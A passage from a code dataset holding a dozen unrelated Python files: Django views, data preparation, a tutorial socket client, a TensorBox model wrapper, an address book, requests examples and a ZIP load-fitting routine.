vix\ndata_vix = pd.concat([vix, snp, bsesn_dr, bsesn_idr, move, move_l1, usd, usd_l1, wti, wti_l1, vvix, vvix_l1, skew, skew_l1, skew_change], axis = 1)\n\n#foward fill the missing columns in the exogenous variables\ndata_vix.iloc[:,1:] = data_vix.iloc[:,1:].ffill()\n\n#drop values that arent in the VIX index\ndata_vix = data_vix.dropna(subset = ['vix'])\n\nprint(data_vix)\n\ndata_vix.to_csv(\"Pdata/vix_is.csv\")\n\n","sub_path":"Pinput/IS_data_prep.py","file_name":"IS_data_prep.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"418889982","text":"from django.shortcuts import render, redirect\n\nfrom django.http import HttpResponse\nfrom Book.models import Book\n# Create your views here.\n\ndef homepage(request):\n # all_books = Book.objects.all().filter(is_deleted='N')\n all_books = Book.active_objects.all()\n return render(request, template_name = 'home.html', context = {\"books\" : all_books})\n\ndef save_book(request):\n print(\"In save book\")\n print(request.POST)\n b_name = request.POST.get(\"name\")\n b_auther = request.POST.get(\"auth\")\n b_qty = request.POST.get(\"qty\")\n b_price = request.POST.get(\"price\")\n b_pub = request.POST.get(\"pub\")\n # b_tr = request.POST.get(\"true\")\n # b_fs = request.POST.get(\"false\")\n # print(b_name, b_auther, b_qty, b_price, b_tr, b_fs)\n print(b_name, b_auther, b_qty, b_price, b_pub)\n\n\n \n if b_pub == \"on\":\n flag = True\n else:\n flag = False\n bk = Book(name = b_name, auther = b_auther, qty = b_qty, price = b_price, is_published = flag) # to save book in database\n '''\n if b_tr =='on':\n flag = True\n elif b_fs == 'on':\n flag = False\n else:\n # raise Exception(\"Please select one option\")\n return HttpResponse(\"Please select one option from True or False button\")\n\n bk = Book(name = b_name, auther = b_auther, qty = b_qty, price = b_price, is_published = flag) # to save book in database\n '''\n bk.save()\n return redirect(\"Welcome\")\n\ndef edit_book(request, id):\n try:\n book_obj = Book.objects.get(id = id) \n except Book.DoesNotExist:\n msg = f\"No book found for id: {id}\"\n return HttpResponse(msg)\n\n # all_books = Book.objects.all().filter(is_deleted='N')\n all_books = Book.active_objects.all()\n return render(request, template_name = 'home.html', context = {\"books\" : all_books, \"book\" : book_obj})\n\ndef delete_book(request, pk):\n book_obj = Book.objects.get(id = pk)\n # book_obj.delete()\n book_obj.is_deleted = 'Y'\n 
book_obj.save()\n    return redirect(\"Welcome\")\n\n\n\ndef hard_delete_book(request, pk):\n    book_obj = Book.objects.get(id=pk)\n    book_obj.delete()\n    return redirect('Welcome')\n\n\ndef restore_book(request, id):\n    book_obj = Book.objects.get(id=id)\n    book_obj.is_deleted = 'N'\n    book_obj.save()\n    return redirect('Welcome')\n\n\ndef show_deleted_data(request):\n    all_deleted_books = Book.inactive_objects.all() # thru custom manager\n    return render(request, template_name='home.html', context={\"books\": all_deleted_books})\n\ndef delete_all_book(request):\n    book = Book.active_objects.all()\n    for bk in book:\n        bk.is_deleted = 'Y'\n        bk.save()\n    return redirect('Welcome')\n\ndef restore_all_book(request):\n    book = Book.inactive_objects.all()\n    for bk in book:\n        bk.is_deleted = 'N'\n        bk.save()\n    return redirect('Welcome')\n\n","sub_path":"Book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"498126896","text":"# -*- coding: utf-8 -*-\n# @Time : 2017-05-11 22:55\n# @Author : jesse\n# @File : Day7_socket_TCP_client.py\n\nimport socket\n\nclient = socket.socket()\nhost = socket.gethostname()\nport = 6964\n\nclient.connect((host,port))\nwhile True:\n    cmd=input(\">>>:\")\n    client.send(cmd.encode(\"utf-8\"))\n    cmd_size=client.recv(1024) # receive the size of the command result sent by the server\n    print(\"Command result size:\", cmd_size)\n    rec_size=0 # reset the received-byte counter for every command\n    while rec_size <= int(cmd_size.decode()):\n        data = client.recv(1024)\n        rec_size+=len(data)\n        print(data.decode(\"utf-8\"))\n    print(\"Total received:\", rec_size)\n\nclient.close()","sub_path":"python05-network_program/socket/day8/Day8_socket_client.py","file_name":"Day8_socket_client.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"71203312","text":"import tensorflow as tf, os, cv2, pdb, numpy as np, time, json, pandas, glob, hashlib\nfrom scipy.misc import imread, imresize\nfrom scipy import misc\nfrom train import build_forward\nfrom utils.annolist import AnnotationLib as al\nfrom utils.train_utils import add_rectangles, rescale_boxes\nfrom shapely.geometry import MultiPolygon, box\nfrom subprocess import check_output\nfrom zipfile import ZipFile\n\npandas.options.mode.chained_assignment = None\n\ndef get_image_dir(weights, test_boxes):\n    weights_iteration = int(weights.split('-')[-1])\n    return '%s/images_%s_%d' % (os.path.dirname(weights), os.path.basename(test_boxes)[:-5], weights_iteration)\n\nNAME = 'TensorBox'\n\nclass TensorBox:\n    name = 'TensorBox'\n\n    @classmethod\n    def mk_hash(cls, path):\n        '''\n        Create an MD5 hash from a model's weight file.\n        Arguments:\n            path : str - path to a TensorBox checkpoint\n        '''\n        dirs = path.split('/')\n        if 'TensorBox' in dirs:\n            dirs = dirs[dirs.index('TensorBox'):]\n            path = '/'.join(dirs)\n        else:\n            path = os.path.join('TensorBox', path)\n\n        md5 = hashlib.md5()\n        md5.update(path.encode('utf-8'))\n        return md5.hexdigest()\n\n    @classmethod\n    def zip_weights(cls, path, base_dir='./'):\n        if not os.path.exists(path + '.meta'):\n            raise ValueError('Invalid TensorBox checkpoint...')\n\n        dirs = path.split('/')\n\n        res = {\n            'name' : 'TensorBox',\n            'instance' : '_'.join(dirs[-2:]),\n            'id' : cls.mk_hash(path)\n        }\n\n        zipfile = os.path.join(base_dir, res['id'] + '.zip')\n\n        if os.path.exists(zipfile):\n            os.remove(zipfile)\n\n        weight_dir = os.path.dirname(path)\n\n        with ZipFile(zipfile, 'w') as z:\n            for file in glob.glob(path + '*'):\n                z.write(file, os.path.join(res['id'], 
os.path.basename(file)))\n z.write(os.path.join(weight_dir, 'hypes.json'), os.path.join(res['id'], 'hypes.json'))\n\n return zipfile\n\n def __init__(self, weights = None, cuda = True):\n if weights is None:\n if not os.path.exists('weights'):\n os.mkdir('weights')\n download_url = 'https://github.com/ArnholdInstitute/ColdSpots/releases/download/1.0/tensorbox.zip'\n if not os.path.exists('weights/tensorbox'):\n print('Downloading weights for tensorbox')\n if not os.path.exists(os.path.join('weights/tensorbox.zip')):\n check_output(['wget', download_url, '-O', 'weights/tensorbox.zip'])\n print('Unzipping...')\n check_output(['unzip', 'weights/tensorbox.zip', '-d', 'weights'])\n description = json.load(open('weights/tensorbox/description.json'))\n weights = os.path.join('weights/tensorbox', description['weights'])\n print('Building model...')\n \n self.weights = weights\n hypes_file = '%s/hypes.json' % os.path.dirname(weights)\n with open(hypes_file, 'r') as f:\n self.H = json.load(f)\n\n tf.reset_default_graph()\n self.H[\"grid_width\"] = self.H[\"image_width\"] / self.H[\"region_size\"]\n self.H[\"grid_height\"] = self.H[\"image_height\"] / self.H[\"region_size\"]\n\n self.x_in = tf.placeholder(tf.float32, name='x_in', shape=[self.H['image_height'], self.H['image_width'], 3])\n pred_boxes, pred_logits, pred_confidences, pred_confs_deltas, pred_boxes_deltas = build_forward(self.H, tf.expand_dims(self.x_in, 0), 'test', reuse=None)\n grid_area = self.H['grid_height'] * self.H['grid_width']\n pred_confidences = tf.reshape(tf.nn.softmax(tf.reshape(pred_confs_deltas, [grid_area * self.H['rnn_len'], 2])), [grid_area, self.H['rnn_len'], 2])\n if self.H['reregress']:\n pred_boxes = pred_boxes + pred_boxes_deltas\n\n self.pred_boxes = pred_boxes\n self.pred_confidences = pred_confidences\n saver = tf.train.Saver()\n\n self.session = tf.Session()\n\n self.session.run(tf.global_variables_initializer())\n saver.restore(self.session, weights)\n\n def close_session(self):\n self.session.close()\n\n def predict_image(self, image):\n \"\"\"\n Infer buildings for a single image.\n Inputs:\n image :: n x m x 3 ndarray - Should be in RGB format\n \"\"\"\n\n orig_img = image.copy()[:,:,:3]\n img = imresize(orig_img, (self.H[\"image_height\"], self.H[\"image_width\"]), interp='cubic')\n feed = {self.x_in: img}\n\n t0 = time.time()\n (np_pred_boxes, np_pred_confidences) = self.session.run([self.pred_boxes, self.pred_confidences], feed_dict=feed)\n total_time = time.time() - t0\n\n new_img, rects, all_rects = add_rectangles(\n self.H, \n [img], \n np_pred_confidences, \n np_pred_boxes,\n use_stitching=True, \n rnn_len=self.H['rnn_len'], \n min_conf=0.5, # only affects `rects`, not `all_rects`\n tau=0.25, \n show_suppressed=False\n )\n\n pred_anno = al.Annotation()\n pred_anno.rects = all_rects\n pred_anno = rescale_boxes((self.H[\"image_height\"], self.H[\"image_width\"]), pred_anno, orig_img.shape[0], orig_img.shape[1])\n\n pred_rects = pandas.DataFrame([[r.x1, r.y1, r.x2, r.y2, r.score] for r in all_rects], columns=['x1', 'y1', 'x2', 'y2', 'score'])\n\n return pred_rects\n\n def predict_all(self, test_boxes_file, data_dir = None):\n annos = json.load(open(test_boxes_file))\n true_annolist = al.parse(test_boxes_file)\n if data_dir is None:\n data_dir = os.path.join(os.path.dirname(test_boxes_file))\n\n total_time = 0.0\n\n for anno in annos:\n img_data = imread(os.path.join(data_dir, anno['image_path']))\n rects = self.predict_image(img_data)\n rects['image_id'] = anno['image_path']\n yield 
rects\n\n\n\n\n\n","sub_path":"tensorbox.py","file_name":"tensorbox.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"444717006","text":"def filter_text(text):\n text = text.lower()\n text = [c for c in text if c in \"123456789йцукенгшщзхъфывапролджэячсмитьбюqwertyuiopasdfghjklzxcvbnm\"]\n text = ''.join(text)\n return text\n\n\nclass Filter():\n def showBanList(self):\n with open('banWords.txt', encoding='utf-8') as f:\n ban = f.read().splitlines()\n return ban\n\n def censor(self, text):\n for word in str(text.splitlines()).strip('[\\']').split(' '):\n for ban_word in self.showBanList():\n if filter_text(word) == ban_word:\n text = text.replace(word, \"****\")\n return text\n","sub_path":"427/xXx_Парные_копыта_xXx/Filter.py","file_name":"Filter.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"569991625","text":"import requests\nimport pandas as pd\n\ndef get_pokemons(url='https://pokeapi.co/api/v2/pokemon-form/?limit=1118'):\n#get pokemons from api and return a dictionary\n\ti_id=1\n\tpokeDict = dict()\n\tresponse = requests.get(url)\n\tif response.status_code == 200:\n\n\t\tpayload = response.json()\n\t\t#try to get results, if not possible then get empty list\n\t\tresults = payload.get('results', [])\n\n\t\tif results:\n\t\t\t#if list not empty, iterate it\n\t\t\tfor pokemon in results:\n\t\t\t\tname = pokemon ['name']\n\t\t\t\tpokeDict[i_id] = name\n\t\t\t\ti_id+=1\n\n\t\treturn pokeDict\n\n\ndef poke_df (poke_dict):\n\t#\n df_pokeDex = pd.DataFrame(index = poke_dict.keys() , data = poke_dict.values(), columns = ['Pokemon'])\n return df_pokeDex\n\nif __name__ == '__main__':\n url = 'https://pokeapi.co/api/v2/pokemon-form'\n df_pokeDex = poke_df(get_pokemons())\n df_pokeDex.to_csv('pokemons_list.csv')","sub_path":"pokemon_list.py","file_name":"pokemon_list.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497927978","text":"import ROOT\nimport numpy as np\nimport RootPlotLibs as RPL\n\ndef extractDataFromFile(pathToData):\n\tcalData = open(pathToCalData,'r').read().split('\\n')[1:]\n\twavelength = []\n\tresponse = []\n\tuncert = []\n\tfor line in calData:\n\t\ttempLine = line.split(',')\n\t\twavelength.append(float(tempLine[0]))\n\t\tresponse.append(float(tempLine[1]))\n\t\tuncert.append(float(tempLine[3]))\n\n\twaveOut = np.array(wavelength)\n\tvalOut = np.array(response)\n\tux = np.zeros_like(waveOut)\n\tuy = np.array(uncert)/100.0/2.0*response\n\t\n\treturn waveOut,valOut,ux,uy\n\npathToCalData = './NIST_photodiode_calibration.csv'\ncurrentCalDataSet = extractDataFromFile(pathToCalData)\nplotOut = ROOT.TGraphErrors(len(currentCalDataSet[0]),currentCalDataSet[0],currentCalDataSet[1],currentCalDataSet[2],currentCalDataSet[3])\n\n# Set the graph parameters\nplotOut.GetXaxis().SetTitle(\"Wavelength [nm]\")\nplotOut.GetYaxis().SetTitle(\"Absolute Responsivity [A/W]\")\nplotOut.GetYaxis().SetTitleOffset(1.25)\nplotOut.SetTitle(\"\")\nplotOut.GetXaxis().SetRangeUser(0.0,700.)\nplotOut.SetLineStyle(1)\n\n# C1 = RPL.ASimpleCanvas(\"PhotoDiodeCalibration\")\n# plotOut.Draw(\"ALP\")\n# \n# C1.SaveAs(\"./photoDiodeCalibration.png\")\n\n'''\nPlot the old calibrations together\n'''\npathToOldCalData = '/Users/chrisbenson/Documents/Research/VUV/Data/analysis2/depend/oldCalibration/NIST_Cals/'\ndata_2008 
= extractDataFromFile(pathToOldCalData+'NIST_photodiode_calibration_2008.csv')\n\nplot2008 = ROOT.TGraphErrors(len(data_2008[0]),data_2008[0],data_2008[1],data_2008[2],data_2008[3])\nplot2008.SetLineColor(1)\nplot2008.GetXaxis().SetTitle(\"Wavelength [nm]\")\nplot2008.GetYaxis().SetTitle(\"Absolute Responsivity [A/W]\")\n\ndata_2014 = extractDataFromFile(pathToOldCalData+'2014_NIST_photodiode_calibration.csv')\nplot2014 = ROOT.TGraphErrors(len(data_2014[0]),data_2014[0],data_2014[1],data_2014[2],data_2014[3])\nplot2014.SetLineColor(2)\n\nC2 = RPL.ASimpleCanvas(\"PhotoCalComp\")\nplot2008.Draw(\"ALP\")\nplot2014.Draw(\"P SAME\")\n\nC2.SaveAs(\"./photoDiodeCalibrationComp.png\")\n\n\n","sub_path":"finalPlots/PDcalibrationPlot.py","file_name":"PDcalibrationPlot.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"374799492","text":"from collections import UserDict\nimport re\nfrom datetime import datetime\n\n\nclass Field:\n    pass\n\n\nclass Phone(Field):\n    def __init__(self, phone):\n        self.__phone = None\n        self.phone = phone\n\n    @property\n    def phone(self):\n        return self.__phone\n\n    @phone.setter\n    def phone(self, phone: str):\n        flag = False\n        if phone.startswith('+380') or phone.startswith('380'):\n            res = re.search(\n                r'(\\+?380(67|68|96|97|98|50|66|95|99|63|73|93|89|94)\\d{7})', phone)\n            if res:\n                flag = True\n                self.__phone = res.group()\n        elif phone.startswith('0'):\n            res = re.search(\n                r'(0(67|68|96|97|98|50|66|95|99|63|73|93|89|94)\\d{7})', phone)\n            if res:\n                flag = True\n                self.__phone = res.group()\n        if not flag:\n            print('Incorrect phone!')\n\n    def __str__(self):\n        return f'{self.__phone}'\n\n\nclass Name(Field):\n    def __init__(self, name):\n        self.__name = None\n        self.name = name\n\n    @property\n    def name(self):\n        return self.__name\n\n    @name.setter\n    def name(self, name: str):\n        if name.isalpha():\n            self.__name = name\n        else:\n            print('Incorrect name!')\n\n    def __str__(self):\n        return f'{self.__name}'\n\n\nclass Birthday(Field):\n    def __init__(self, birthday):\n        self.__birthday = None\n        self.birthday = birthday\n\n    @property\n    def birthday(self):\n        return self.__birthday\n\n    @birthday.setter\n    def birthday(self, birthday):\n        flag = False\n        date = birthday.split('.')\n        if len(date) == 3:\n            if int(date[0]) <= 31 and int(date[1]) <= 12:\n                res = re.search(r'\\d{1,2}\\.\\d{1,2}\\.\\d{4}', birthday)\n                if res:\n                    birthday_formatted = datetime.strptime(\n                        res.group(), '%d.%m.%Y')\n                    flag = True\n                    self.__birthday = birthday_formatted\n        if not flag:\n            print('Incorrect date or format!\\nTry to enter like the example: 14.06.2002')\n\n    def __str__(self):\n        if self.__birthday:\n            return f'{self.__birthday.date()}'\n        return 'None'\n\n    def __repr__(self):\n        if self.__birthday:\n            return f'{self.__birthday.date()}'\n        return 'None'\n\n\nclass Record:\n    def __init__(self, name, phone, birthday):\n        self.name = Name(name)\n        self.phone = Phone(phone)\n        if birthday:\n            self.birthday = Birthday(birthday).__str__()\n        else:\n            self.birthday = birthday\n\n    def days_to_birthday(self):\n        if self.birthday != 'None' and self.birthday:\n            date_now = datetime.now()\n            birth_date = datetime.strptime(self.birthday, '%Y-%m-%d')\n            birth_date = birth_date.replace(year=date_now.year)\n            if (birth_date - date_now).days < 0:\n                birth_date = birth_date.replace(year=birth_date.year + 1)\n            return (birth_date - date_now).days\n        return None  # no birthday stored for this record\n\n    def __str__(self):\n        if self.birthday != 'None' and self.birthday:\n            return f'{self.name},{self.phone},{Record.days_to_birthday(self)} days left to the birthday'\n        return f'{self.name},{self.phone}'\n\n\nclass AddressBook(UserDict):\n    def add_record(self, rec):\n        self.data[rec.name.__str__()] = rec.__str__()\n        if 'None' in self.data.keys():\n            self.data.pop('None')\n\n    def change_phone(self, rec):\n        self.data[rec.name.__str__()] = rec.__str__()\n\n    def find_phone(self, name):\n        if name in self.data.keys():\n            value = self.data[name]\n            res = re.search(r'\\+?\\d+', value)\n            return res.group()\n        return 'Does not exist in database!'\n\n\ndef main():\n    main_address_book = AddressBook()\n    while True:\n        command = input('Command: ').lower()\n        sep_val = command.split(' ')\n        if sep_val[0] == 'add' and len(sep_val) > 2:\n            main_address_book.add_record(\n                Record(sep_val[1].title(), sep_val[2], sep_val[3] if len(sep_val) == 4 else None))\n        elif sep_val[0] == 'change' and len(sep_val) > 2:\n            main_address_book.change_phone(\n                Record(sep_val[1].title(), sep_val[2], sep_val[3] if len(sep_val) == 4 else None))\n        elif sep_val[0] == 'phone':\n            print(main_address_book.find_phone(sep_val[1].title()))\n        elif sep_val[0] == 'show' and sep_val[1] == 'all':\n            print(main_address_book)\n        elif command in ['good bye', \"close\", \"exit\", '.']:\n            print('Good bye!')\n            break\n        elif sep_val[0] == 'hello':\n            print('How can I help you?')\n        else:\n            print('Incorrect! Try again')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"module_11/homework_11.py","file_name":"homework_11.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"127237030","text":"from django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom edc.audit.audit_trail import AuditTrail\n\nfrom ..choices import MOBILITY, SELF_CARE, ACTIVITIES, PAIN, ANXIETY\n\nfrom .base_scheduled_visit_model import BaseScheduledVisitModel\n\n\nclass QualityOfLife (BaseScheduledVisitModel):\n\n    \"\"\"CE001\"\"\"\n\n    mobility = models.CharField(\n        verbose_name=_(\"Mobility\"),\n        max_length=45,\n        choices=MOBILITY,\n        help_text=\"\",\n    )\n    self_care = models.CharField(\n        verbose_name=_(\"Self-Care\"),\n        max_length=65,\n        choices=SELF_CARE,\n        help_text=\"\",\n    )\n    activities = models.CharField(\n        verbose_name=_(\"Usual Activities (e.g. work, study, housework, family or leisure activities)\"),\n        max_length=50,\n        choices=ACTIVITIES,\n        help_text=\"\",\n    )\n    pain = models.CharField(\n        verbose_name=_(\"Pain / Discomfort \"),\n        max_length=35,\n        choices=PAIN,\n        help_text=\"\",\n    )\n    anxiety = models.CharField(\n        verbose_name=_(\"Anxiety / Depression \"),\n        max_length=40,\n        choices=ANXIETY,\n        help_text=\"\",\n    )\n    health_today = models.IntegerField(\n        verbose_name=_(\"We would like to know how good or bad your health is TODAY. \"\n                       \"This scale is numbered from 0 to 100. 100 means the 'best' health\"\n                       \" you can imagine. 0 means the 'worst' health you can imagine. \"\n                       \"Indicate on the scale how your health is TODAY. 
\"),\n max_length=3,\n validators=[MinValueValidator(0), MaxValueValidator(100)],\n null=True,\n blank=True,\n help_text=(\"Note:Interviewer, please record corresponding number in the boxes.\"\n \" If participant does not want to answer, leave blank\"),\n )\n\n history = AuditTrail()\n\n class Meta:\n app_label = 'bcpp_subject'\n verbose_name = \"Quality of Life\"\n verbose_name_plural = \"Quality of Life\"\n","sub_path":"apps/bcpp_subject/models/quality_of_life.py","file_name":"quality_of_life.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"647645402","text":"\"\"\"Utilities for copying data from a source database to a new DB server.\n\nOperators should use this code via the command:\n\n ./run.py copydb\n\nConnection and Crossover classes are from `sqlacrossover\n`_, Copyright 2015\nAndrew Grigorev. Apache license. See licenses/sqlacrossover.txt.\n\"\"\"\n\nimport logging\nimport sqlalchemy as sa\n\nlogger = logging.getLogger(__name__)\n\n\nclass Connection():\n def __init__(self, url):\n self.engine = sa.create_engine(url)\n self.conn = self.engine.connect()\n self.meta = sa.MetaData()\n self.meta.reflect(self.engine)\n\n tables = sa.schema.sort_tables(self.meta.tables.values())\n self.tables = [i.name for i in tables]\n\n\nclass Crossover():\n\n def __init__(self, source, target, bulk):\n self.source = Connection(source)\n self.target = Connection(target)\n self.bulk = bulk\n\n self.insert_data = self.insert_data_simple\n\n def copy_data_in_transaction(self):\n with self.target.conn.begin():\n self.copy_data()\n\n def copy_data(self):\n if set(self.source.tables) != set(self.target.tables):\n logger.warning(\"Source and target database table lists are not \"\n \"identical!\")\n for table in self.source.tables:\n if table in self.target.tables:\n self.copy_table(table)\n\n def copy_table(self, table):\n offset = 0\n source_table = self.target.meta.tables[table]\n while True:\n data = list(self.source.conn.execute(\n sa.select([source_table]).offset(offset).limit(self.bulk)\n ))\n if not data:\n break\n self.insert_data(table, data)\n offset += self.bulk\n\n def insert_data_simple(self, table, data):\n self.target.conn.execute(self.target.meta.tables[table].insert(), data)\n","sub_path":"app/dbcopy.py","file_name":"dbcopy.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"233438311","text":"#coding = utf -8\r\n__author__ = 'Aimee'\r\n\r\n#params ,headers, data,json,files\r\nimport requests\r\nimport json\r\n\r\nhost = 'https://httpbin.org/'\r\nendpoint = 'post'\r\nurl = ''.join([host,endpoint])\r\nparams = {'show_env' :1}\r\n\r\n#对应postman body中的form-data形式\r\n# data = {'a':\"aimee\",'b':'学测试'}\r\n#\r\n# r = requests.post(url,params=params,data=data)\r\n# print(r.text)\r\n#\r\n# res = r.json()\r\n# print(res['form'])\r\n\r\n\r\n#json 对应postman中 body中 raw格式将json格式复制进去\r\n\r\n# data = {\r\n# \"employees\": [\r\n# { \"firstName\":\"Bill\" , \"lastName\":\"Gates\" },\r\n# { \"firstName\":\"George\" , \"lastName\":\"Bush\" },\r\n# { \"firstName\":\"Thomas\" , \"lastName\":\"Carter\" }\r\n# ]\r\n# }\r\n\r\n# r = requests.post(url,data=data) #直接传无效\r\n# print(r.text)\r\n\r\n# r = requests.post(url,data=json.dumps(data)) #低版本\r\n# r = requests.post(url,json=data) #request模块高版本支持json关键字参数\r\n# print(r.text)\r\n# response =r.json()\r\n# print(response['json'])\r\n\r\n\r\n#files\r\n#1.普通上传文件\r\n# files 
= {'files':open('test.txt','rb')}\r\n#2、通过文件上传字符串\r\n# files = {'files':('test.txt','aimee is a tester')}\r\n#3、自定义文件名、文件类型以及请求头(请求文件名称、文件路径、文件类型、文件请求头)\r\n# files = {'files':open('江湖.jpg','rb')}\r\n# files = {'files':('江湖.jpg',open('江湖.jpg','rb'),'image/png')}\r\n\r\n#4、传送多个文件\r\n# files = [\r\n# ('field1',('test.txt',open('test.txt','rb'))),\r\n# ('field2',('江湖.jpg',open('江湖.jpg','rb'),'image/png'))\r\n#\r\n# ]\r\n\r\n#5、流式上传\r\nwith open('test.txt') as f:\r\n r = requests.post(url,data=f)\r\n\r\n# r = requests.post(url,files=files)\r\nprint(r.headers)\r\nprint(r.text)\r\n\r\n\r\n","sub_path":"第一期/广州-Aimee/interface/test_case/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"269591941","text":"'''\nCreated on Apr 27, 2018\n\n@author: thay838\n\nOriginal R code written by Dave Engel. R code adapted to Python by Bin Zheng.\nFinal adoption into application by Brandon Thayer.\n\nNotes from Dave:\nAugmented Lagrangian Adaptive Barrier Minimization\n'''\nimport numpy as np\nimport math\nimport mystic.solvers as my\nfrom scipy.optimize import minimize\n\n# Constant for ZIP coefficients. ORDER MATTERS!\nZIPTerms = ['impedance', 'current', 'power']\n\n# List of available solvers for zipFit\nSOLVERS = ['fmin_powell', 'SLSQP']\n\n# Constants for convergence tolerance\nFTOL = 1e-8\nGTOL = 5 # Number of iterations without change for fmin_powell\n\ndef zipFit(V, P, Q, Vn=240.0, solver='fmin_powell'):\n \"\"\"Solve for ZIP coefficients usable by GridLAB-D.\n \n V: voltage magnitude array\n P: real power array\n Q: reactive power array\n Vn: nominal voltage\n solver: either 'fmin_powell' to use mystic's modified scipy fmin_powell \n solver, or 'SLSQP' to use scipy's sequential least squares programming\n solver.\n \"\"\"\n # Estimate nominal power\n Sn = estimateNominalPower(P=P, Q=Q)\n \n # Massage into standard polynomial format\n Vbar = V/Vn\n Pbar = P/Sn\n Qbar = Q/Sn\n \n # Initial parameters for ZIP model\n # TODO: initialize from previously computed coefficients to start.\n # Why are we multiply by 1/18?\n par0 = np.ones(6)*(1/18)\n \n # Solve.\n if solver == 'fmin_powell':\n sol = my.fmin_powell(Object, args=(Vbar, Pbar, Qbar), x0=par0,\n contraint=Constrain, disp=False, gtol=GTOL,\n ftol=FTOL, full_output=True)\n # Extract the polynomial coefficients\n p = sol[0][0:3]\n q = sol[0][3:6]\n \n # Get the value of the objective function (so the squared error)\n err = sol[1]\n \n elif solver == 'SLSQP':\n sol = minimize(Object, par0, args=(Vbar, Pbar, Qbar), method='SLSQP',\n constraints={'type':'eq', 'fun': Constrain},\n bounds=None, options={'ftol': FTOL})\n \n # Extract the polynomial coefficients\n p = sol.x[0:3]\n q = sol.x[3:6]\n \n # Get the value of the objective function (so the squared error)\n err = sol.fun\n else:\n raise UserWarning('Given solver, {}, is not implemented.'.format(solver))\n \n # Some code Bin had in?\n #cons2 = {'type':'eq', 'fun': Constrain2}\n #cons3 = {'type':'eq', 'fun': Constrain3}\n \"\"\"\n if abs(Constrain(opti.x))>0.75:\n opti = minimize(Object, par0, args=(V1bar, P1bar, Q1bar), method='SLSQP', constraints = cons2, bounds = None)\n \n if abs(Constrain(opti.x))>2.0:\n opti = minimize(Object, par0, args=(V1bar, P1bar, Q1bar), method='SLSQP', constraints = cons3, bounds = None)\n \"\"\"\n \n # Convert the polynomial coefficients to GridLAB-D format (fractions and\n # power factors)\n coeff = polyToGLD(p, q)\n \n # Collect other useful 
information\n    coeff['base_power'] = Sn\n    coeff['error'] = err\n    coeff['poly'] = (*p, *q)\n    \n    return coeff\n\ndef estimateNominalPower(P, Q):\n    \"\"\"Given a set of apparent power measurements, estimate nominal power.\n    \n    For now, we'll simply use the median of the apparent power.\n    \"\"\"\n    Sn = np.median(np.sqrt(np.multiply(P,P) + np.multiply(Q,Q)))\n    return Sn\n\ndef Object(Params, Vbar, Pbar, Qbar):\n    \"\"\"Objective function for minimization. Minimize squared error.\"\"\"\n    a1, a2, a3, b1, b2, b3 = Params\n    return sum( (Pbar - (a1*(Vbar*Vbar)+a2*Vbar+a3))**2\n                + (Qbar - (b1*(Vbar*Vbar)+b2*Vbar+b3))**2 )/len(Vbar)\n    \ndef Constrain(Params):\n    \"\"\"Constraint for ZIP modeling - the three fraction magnitudes must sum to one.\"\"\"\n    a1, a2, a3, b1, b2, b3 = Params\n    return math.sqrt(a1*a1 + b1*b1) + math.sqrt(a2*a2 + b2*b2) + math.sqrt(a3*a3 + b3*b3) - 1.0\n\n# These functions aren't currently being used.\n'''\ndef Constrain2(Params):\n    a1, a2, a3, b1, b2, b3 = Params\n    return math.sqrt(a1*a1 + b1*b1) + math.sqrt(a2*a2 + b2*b2) + math.sqrt(a3*a3 + b3*b3) - 2.0\n\ndef Constrain3(Params):\n    a1, a2, a3, b1, b2, b3 = Params\n    return math.sqrt(a1*a1 + b1*b1) + math.sqrt(a2*a2 + b2*b2) + math.sqrt(a3*a3 + b3*b3) - 3.0\n'''\n\n\ndef polyToGLD(p, q):\n    \"\"\"Takes polynomial ZIP coefficients and converts them to GridLAB-D format.\n    \n    GridLAB-D takes in ZIP fractions and 'power factors' (cosine of the angle).\n    Additionally, a negative power factor is used for leading, and a positive\n    power factor is used for lagging. Essentially, a negative PF is a signal\n    to flip the imaginary component of apparent power.\n    \n    NOTE: we're counting on coefficients to come in 'a, b, c' order, AKA\n    impedance, current, power.\n    \n    So:\n    p = (a1, a2, a3)\n    q = (b1, b2, b3)\n    a1 = Z%cos(thetaZ), b1 = Z%sin(thetaZ)\n    a2 = I%cos(thetaI), b2 = I%sin(thetaI)\n    a3 = P%cos(thetaP), b3 = P%sin(thetaP)\n    \"\"\"\n    # Initialize return\n    out = {}\n    \n    # Track index into p and q as we loop over the ZIP terms in order.\n    i = 0\n    for k in ZIPTerms:\n        # Initialize the fraction. Note that this reduces correctly, but loses\n        # sign information:\n        # a1 = Z%*cos(thetaZ), b1 = Z%*sin(thetaZ) and so on.\n        fraction = math.sqrt(p[i]*p[i]+q[i]*q[i])\n        \n        # Derive the power-factor:\n        try:\n            pf = abs(p[i]/fraction)\n        except ZeroDivisionError:\n            # If we divided by zero, simply make the power factor 1\n            pf = 1\n        \n        # match what is done in Gridlab-D\n        if p[i] > 0 and 